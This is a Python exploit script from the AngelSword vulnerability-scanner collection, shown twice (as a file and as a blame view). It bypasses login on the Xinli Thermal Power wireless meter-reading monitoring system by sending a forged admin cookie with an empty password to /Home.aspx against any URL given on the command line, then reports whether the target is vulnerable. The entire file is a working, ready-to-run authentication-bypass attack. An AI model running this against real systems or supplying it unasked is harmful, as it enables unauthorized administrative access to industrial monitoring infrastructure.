AngelSword/industrial/wireless_monitor_priv_elevation.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: 新力热电无线抄表监控系统绕过后台登录
referer: http://www.wooyun.org/bugs/wooyun-2016-0178117
author: Lucifer
description: 替换COOKIE可达到绕过登录的目的。
'''
import sys
import json
import requests
import warnings
from termcolor import cprint

class wireless_monitor_priv_elevation_BaseVerify:
    def __init__(self, url):
        self.url = url

    def run(self):
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
            "Cookie":"LoginName=admin; Unit_Or_Client=%e6%96%b0%e5%8a%9b%e7%83%ad%e7%94%b5; UserType=%e7%b3%bb%e7%bb%9f%e5%b7%a5%e7%a8%8b%e5%b8%88; UserName=null; user=LoginName=admin&password="
        }
        payload = "/Home.aspx"
        vulnurl = self.url + payload
        try:
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            if "无线抄表监控管理系统" in req.text:
                cprint("[+]存在新力热电无线抄表管理系统后台绕过...(高危)\tpayload: "+vulnurl+"\tpost: Cookie:"+json.dumps(headers["Cookie"]), "red")
            else:
                cprint("[-]不存在wireless_monitor_priv_elevation漏洞", "white", "on_grey")

        except:
            cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")


if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = wireless_monitor_priv_elevation_BaseVerify(sys.argv[1])
    testVuln.run()
add all files 2017-02-20 17:25:03 +08:00			`#!/usr/bin/env python`
			`# -- coding: utf-8 --`
			`'''`
			`name: 新力热电无线抄表监控系统绕过后台登录`
			`referer: http://www.wooyun.org/bugs/wooyun-2016-0178117`
			`author: Lucifer`
			`description: 替换COOKIE可达到绕过登录的目的。`
			`'''`
			`import sys`
			`import json`
			`import requests`
			`import warnings`
			`from termcolor import cprint`

			`class wireless_monitor_priv_elevation_BaseVerify:`
			`def __init__(self, url):`
			`self.url = url`

			`def run(self):`
			`headers = {`
			`"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",`
			`"Cookie":"LoginName=admin; Unit_Or_Client=%e6%96%b0%e5%8a%9b%e7%83%ad%e7%94%b5; UserType=%e7%b3%bb%e7%bb%9f%e5%b7%a5%e7%a8%8b%e5%b8%88; UserName=null; user=LoginName=admin&password="`
			`}`
			`payload = "/Home.aspx"`
			`vulnurl = self.url + payload`
			`try:`
			`req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)`
			`if "无线抄表监控管理系统" in req.text:`
			`cprint("[+]存在新力热电无线抄表管理系统后台绕过...(高危)\tpayload: "+vulnurl+"\tpost: Cookie:"+json.dumps(headers["Cookie"]), "red")`
update 2018-10-31 11:40:59 +08:00			`else:`
			`cprint("[-]不存在wireless_monitor_priv_elevation漏洞", "white", "on_grey")`
add all files 2017-02-20 17:25:03 +08:00
			`except:`
update 2018-10-31 11:40:59 +08:00			`cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")`

add all files 2017-02-20 17:25:03 +08:00
			`if __name__ == "__main__":`
			`warnings.filterwarnings("ignore")`
			`testVuln = wireless_monitor_priv_elevation_BaseVerify(sys.argv[1])`
			`testVuln.run()`